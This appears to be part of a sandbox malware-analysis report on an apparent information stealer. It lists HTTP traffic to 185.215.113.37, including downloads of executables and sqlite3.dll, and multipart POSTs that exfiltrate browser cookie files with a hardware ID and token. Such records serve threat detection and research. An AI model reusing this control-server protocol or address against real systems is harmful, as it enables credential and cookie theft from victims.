00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 24 Oct 2024 00:50:22 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 24 Oct 2024 00:50:24 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 24 Oct 2024 00:50:24 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IECGIEBAEBFIIECBGCBGHost: 185.215.113.37Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 45 43 47 49 45 42 41 45 42 46 49 49 45 43 42 47 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 44 43 37 31 39 41 34 31 30 42 42 38 38 33 38 38 34 31 37 39 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 47 49 45 42 41 45 42 46 49 49 45 43 42 47 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 47 49 45 42 41 45 42 46 49 49 45 43 42 47 43 42 47 2d 2d 0d 0a Data Ascii: ------IECGIEBAEBFIIECBGCBGContent-Disposition: form-data; name="hwid"FDC719A410BB883884179------IECGIEBAEBFIIECBGCBGContent-Disposition: form-data; name="build"doma------IECGIEBAEBFIIECBGCBG--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFBKKFBAEGDHJJJJKFBKHost: 185.215.113.37Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 42 4b 4b 46 42 41 45 47 44 48 4a 4a 4a 4a 4b 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 33 34 63 34 36 38 36 64 66 35 34 35 32 36 66 65 35 30 65 34 35 30 36 36 37 30 35 32 61 61 34 65 61 30 62 66 33 35 62 62 66 30 61 61 36 33 31 35 33 66 34 63 63 30 35 66 36 64 63 39 35 34 32 38 34 33 65 30 65 65 32 0d 0a 2d 2d 2d 2d 2d 2d 41 46 42 4b 4b 46 42 41 45 47 44 48 4a 4a 4a 4a 4b 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 41 46 42 4b 4b 46 42 41 45 47 44 48 4a 4a 4a 4a 4b 46 42 4b 2d 2d 0d 0a Data Ascii: ------AFBKKFBAEGDHJJJJKFBKContent-Disposition: form-data; name="token"c34c4686df54526fe50e450667052aa4ea0bf35bbf0aa63153f4cc05f6dc9542843e0ee2------AFBKKFBAEGDHJJJJKFBKContent-Disposition: form-data; name="message"browsers------AFBKKFBAEGDHJJJJKFBK--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JEBKKEGDBFIIEBFHIEHCHost: 185.215.113.37Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 45 42 4b 4b 45 47 44 42 46 49 49 45 42 46 48 49 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 33 34 63 34 36 38 36 64 66 35 34 35 32 36 66 65 35 30 65 34 35 30 36 36 37 30 35 32 61 61 34 65 61 30 62 66 33 35 62 62 66 30 61 61 36 33 31 35 33 66 34 63 63 30 35 66 36 64 63 39 35 34 32 38 34 33 65 30 65 65 32 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 4b 4b 45 47 44 42 46 49 49 45 42 46 48 49 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 4b 4b 45 47 44 42 46 49 49 45 42 46 48 49 45 48 43 2d 2d 0d 0a Data Ascii: ------JEBKKEGDBFIIEBFHIEHCContent-Disposition: form-data; name="token"c34c4686df54526fe50e450667052aa4ea0bf35bbf0aa63153f4cc05f6dc9542843e0ee2------JEBKKEGDBFIIEBFHIEHCContent-Disposition: form-data; name="message"plugins------JEBKKEGDBFIIEBFHIEHC--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCGIJKJJKEBGHJKFIDGCHost: 185.215.113.37Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 43 47 49 4a 4b 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 33 34 63 34 36 38 36 64 66 35 34 35 32 36 66 65 35 30 65 34 35 30 36 36 37 30 35 32 61 61 34 65 61 30 62 66 33 35 62 62 66 30 61 61 36 33 31 35 33 66 34 63 63 30 35 66 36 64 63 39 35 34 32 38 34 33 65 30 65 65 32 0d 0a 2d 2d 2d 2d 2d 2d 46 43 47 49 4a 4b 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 46 43 47 49 4a 4b 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 2d 2d 0d 0a Data Ascii: ------FCGIJKJJKEBGHJKFIDGCContent-Disposition: form-data; name="token"c34c4686df54526fe50e450667052aa4ea0bf35bbf0aa63153f4cc05f6dc9542843e0ee2------FCGIJKJJKEBGHJKFIDGCContent-Disposition: form-data; name="message"fplugins------FCGIJKJJKEBGHJKFIDGC--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCFBAFIDAECAKFHJDBAFHost: 185.215.113.37Content-Length: 7907Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/sqlite3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCGIJKJJKEBGHJKFIDGCHost: 185.215.113.37Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 43 47 49 4a 4b 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 33 34 63 34 36 38 36 64 66 35 34 35 32 36 66 65 35 30 65 34 35 30 36 36 37 30 35 32 61 61 34 65 61 30 62 66 33 35 62 62 66 30 61 61 36 33 31 35 33 66 34 63 63 30 35 66 36 64 63 39 35 34 32 38 34 33 65 30 65 65 32 0d 0a 2d 2d 2d 2d 2d 2d 46 43 47 49 4a 4b 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 46 43 47 49 4a 4b 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 56 46 4a 56 52 51 6b 76 43 55 5a 42 54 46 4e 46 43 54 45 32 4f 54 6b 77 4d 54 45 32 4d 54 55 4a 4d 56 42 66 53 6b 46 53 43 54 49 77 4d 6a 4d 74 4d 54 41 74 4d 44 51 74 4d 54 4d 4b 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 4d 77 4f 44 45 31 43 55 35 4a 52 41 6b 31 4d 54 45 39 52 57 59 31 64 6c 42 47 52 33 63 74 54 56 70 5a 62 7a 56 6f 64 32 55 74 4d 46 52 6f 51 56 5a 7a 62 47 4a 34 59 6d 31 32 5a 46 5a 61 64 32 4e 49 62 6e 46 57 65 6c 64 49 51 56 55 78 4e 48 59 31 4d 30 31 4f 4d 56 5a 32 64 33 5a 52 63 54 68 69 59 56 6c 6d 5a 7a 49 74 53 55 46 30 63 56 70 43 56 6a 56 4f 54 30 77 31 63 6e 5a 71 4d 6b 35 58 53 58 46 79 65 6a 4d 33 4e 31 56 6f 54 47 52 49 64 45 39 6e 52 53 31 30 53 6d 46 43 62 46 56 43 57 55 70 46 61 48 56 48 63 31 46 6b 63 57 35 70 4d 32 39 55 53 6d 63 77 59 6e 4a 78 64 6a 46 6b 61 6d 52 70 54 45 70 35 64 6c 52 54 56 57 68 6b 53 79 31 6a 4e 55 70 58 59 57 52 44 55 33 4e 56 54 46 42 4d 65 6d 68 54 65 43 31 47 4c 54 5a 33 54 32 63 30 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 43 47 49 4a 4b 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 2d 2d 0d 0a Data Ascii: ------FCGIJKJJKEBGHJKFIDGCContent-Disposition: form-data; name="token"c34c4686df54526fe50e450667052aa4ea0bf35bbf0aa63153f4cc05f6dc9542843e0ee2------FCGIJKJJKEBGHJKFIDGCContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------FCGIJKJJKEBGHJKFIDGCContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwMTE2MTUJMVBfSkFSCTIwMjMtMTAtMDQtMTMKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjMwODE1CU5JRAk1MTE9RWY1dlBGR3ctTVpZbzVod2UtMFRoQVZzbGJ4Y
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJDBAFIECGHCBFIDGDAAHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 4a 44 42 41 46 49 45 43 47 48 43 42 46 49 44 47 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 33 34 63 34 36 38 36 64 66 35 34 35 32 36 66 65 35 30 65 34 35 30 36 36 37 30 35 32 61 61 34 65 61 30 62 66 33 35 62 62 66 30 61 61 36 33 31 35 33 66 34 63 63 30 35 66 36 64 63 39 35 34 32 38 34 33 65 30 65 65 32 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 42 41 46 49 45 43 47 48 43 42 46 49 44 47 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 42 41 46 49 45 43 47 48 43 42 46 49 44 47 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 42 41 46 49 45 43 47 48 43 42 46 49 44 47 44 41 41 2d 2d 0d 0a Data Ascii: ------HJDBAFIECGHCBFIDGDAAContent-Disposition: form-data; name="token"c34c4686df54526fe50e450667052aa4ea0bf35bbf0aa63153f4cc05f6dc9542843e0ee2------HJDBAFIECGHCBFIDGDAAContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------HJDBAFIECGHCBFIDGDAAContent-Disposition: form-data; name="file"------HJDBAFIECGHCBFIDGDAA--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKKEGDGCGDAKEBFIJECGHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 4b 45 47 44 47 43 47 44 41 4b 45 42 46 49 4a 45 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 33 34 63 34 36 38 36 64 66 35 34 35 32 36 66 65 35 30 65 34 35 30 36 36 37 30 35 32 61 61 34 65 61 30 62 66 33 35 62 62 66 30 61 61 36 33 31 35 33 66 34 63 63 30 35 66 36 64 63 39 35 34 32 38 34 33 65 30 65 65 32 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 45 47 44 47 43 47 44 41 4b 45 42 46 49 4a 45 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 